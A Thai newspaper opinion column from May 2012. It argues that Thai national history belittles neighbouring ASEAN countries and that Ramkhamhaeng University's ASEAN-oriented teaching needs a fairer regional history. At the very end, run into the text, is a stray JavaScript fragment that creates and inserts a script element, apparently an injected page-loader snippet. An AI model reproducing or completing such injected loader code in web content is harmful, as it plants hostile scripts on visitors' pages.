Download PDF

มติชนรายวัน ฉบับประจำวันอังคารที่ 15 พฤษภาคม 2555

 

          ประวัติศาสตร์แห่งชาติของไทย ยกตนข่มประวัติศาสตร์เพื่อนบ้านประชาคมอาเซียนมานาน ถ้าไม่แก้ไขตรงนี้ก็ยากที่คนไทยจะรู้จักและเข้าใจอาเซียนอย่างแท้จริง

          อธิการบดี ม. รามคำแหง แถลงว่าจะปรับการเรียนการสอนเพื่อรองรับการเข้าสู่ประชาคมอาเซียน

          ดังนั้นสิ่งแรกที่ต้องปฏิบัติคืออาจารย์ผู้สอนต้องทำความเข้าใจประวัติศาสตร์สุวรรณภูมิในอุษาคเนย์ให้ดีและถูกต้องเป็นธรรมตามพยานหลักฐานที่มีจริงๆ

          ผศ. วุฒิศักดิ์ ลาภเจริญทรัพย์ อธิการบดีมหาวิทยาลัยรามคำแหง (ม.ร.) เปิดเผยว่า ขณะนี้ ม.ร. ปรับการเรียนการสอนเพื่อรองรับการเข้าสู่ประชาคมอาเซียน โดยในทุกสาขาวิชาทุกคณะ อาจารย์ผู้สอนต้องสอดแทรกความเป็นอาเซียน เพื่อกระตุ้นให้นักศึกษาเกิดความตื่นตัว และเตรียมความพร้อม โดยเฉพาะการเรียนรู้ด้านวัฒนธรรม กฎระเบียบ และภาษาของประเทศเพื่อนบ้าน

          ม.ร. มีโครงการอบรมภาษาประเทศเพื่อนบ้าน เช่น ภาษาลาว กัมพูชา เวียดนาม พม่า ฟรีให้แก่นักศึกษา เปิดอบรมเทคโนโลยีในการค้นคว้าติดต่อกับประเทศเพื่อนบ้านแก่นักศึกษา โดยลงสมัครเรียนได้ทันที

          นอกจากนี้ ยังได้มอบหมายให้แต่ละคณะจัดอบรม และเพิ่มเติมเนื้อหาสาระที่เกี่ยวข้องกับอาเซียน อาทิ คณะนิติศาสตร์, คณะรัฐศาสตร์ เปิดศูนย์ศึกษาเอเชียอาคเนย์, คณะวิศวกรรมศาสตร์ แม้จะไม่มีเนื้อหาสาระเกี่ยวกับอาเซียนมาก แต่ก็ต้องสร้างความรู้ ความเข้าใจ ในการเข้าไปทำงานแก่ประเทศในอาเซียน (คม ชัด ลึก ฉบับวันอังคารที่ 8 พฤษภาคม 2555 หน้า 10)

          แต่ในสภาพที่เป็นอยู่ทุกวันนี้ ไม่ว่า นิติศาสตร์, รัฐศาสตร์, วิศวฯ รวมถึงภาษาและวัฒนธรรม บรรดาอาจารย์ล้วนถูกครอบงำด้วยประวัติศาสตร์แห่งชาติของไทย ที่ยกตนข่มประเทศเพื่อนบ้านโดยรอบ แล้วก่อให้เกิดวิวาทบาดหมางอย่างรุนแรงไม่รู้จบ

          ยกตัวอย่างโขนและละคร ที่พากันอธิบายอย่างคลุ้มคลั่งว่าเป็นของไทยแท้ๆนั้น จริงๆแล้วมีกำเนิดจาก“ละโคนพระกรุณา” ในราชสำนักอาณาจักรกัมพูชา อย่างน้อยตั้งแต่ก่อน พ.ศ. 1600 (สมัยนั้นยังไม่มีรัฐสุโขทัย แล้วยังไม่มีกลุ่มชนเรียกตัวเองว่า“คนไทย”)

          ประวัติศาสตร์ไทย เป็นส่วนหนึ่งของประวัติศาสตร์สุวรรณภูมิและอุษาคเนย์อย่างแยกจากกันไม่ได้

          หากไม่เริ่มด้วยความเข้าใจความจริงนี้ การเรียนการสอนเพื่อรองรับการเข้าสู่ประชาคมอาเซียน ก็ไม่ได้ผลก้าวหน้า กลับมีแต่จะได้ผลถอยหลังเข้าคลองแล้วเข้ารกเข้าพงมากกว่าเก่า

          ม. รามคำแหง น่าจะขยับขยายประเด็นประวัติศาสตร์สุวรรณภูมิและอุษาคเนย์ให้กว้างขวางกว่าการเรียนการสอนตามปกติ โดยสร้างเป็นกิจกรรมแบ่งปันความรู้สู่สาธารณะด้วย ก็จะเป็นคุณูปการต่อสังคมไทยอย่างมหาศาลdocument.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement(‘script’);